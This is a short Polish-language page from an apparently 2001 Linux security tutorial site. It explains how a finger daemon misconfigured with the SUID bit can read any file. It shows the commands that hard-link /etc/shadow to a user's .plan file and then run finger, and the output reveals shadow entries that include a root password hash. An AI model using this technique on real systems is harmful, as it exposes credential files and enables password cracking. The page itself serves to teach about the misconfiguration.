 |
Bezpieczeństwo systemów Linux'owych |
|
Linux Security - Suidy
|
|
Finger
 |
| [1] [2] [3] [4] [5] |
|
|
Błędna konfiguracja demona odpowiedzialnego za usługę finger (nadanie mu włączonego
atrybutu SUID powoduje, że może on odczytać dowolny plik. Każdy użytkownik ma
przyporządkowany w swoim katalogu domowym plik .plan, który może zawierać dodatkowe
informacje o użytkowniku. Wystarczy powiązać go z odpowiednim plikiem i teraz odczytując
informacje o własnym sobie można odczytać zawartość pliku do którego nie mieliśmy przedtem
uprawnień
|
[tronix@localhost]$ ln /etc/shadow .plan [tronix@localhost]$ finger tronix Login: tronix Name:Linux user Directory: /home/tronix Shell: /bin/bash On since Fri Mar 16 16:01 (CET) on tty3 No mail. Plan: root:zttJEkXo/9XCM:11389:0:99999:7::: bin:*:11389:0:99999:7::: daemon:*:11389:0:99999:7::: |
ICMP - Pine - Fork - Firewall - Bezpieczne partycje
Suidy - Skanowanie - Word exportable - Backdoor'y - Sumy kontrolne
Perl - Logrotate - Shell przez WWW - Forum - Księga gości - Statystka - Linki
Kontakt: tronix@2com.pl
Copyright by Tronix (c)2001 All Rights Reserved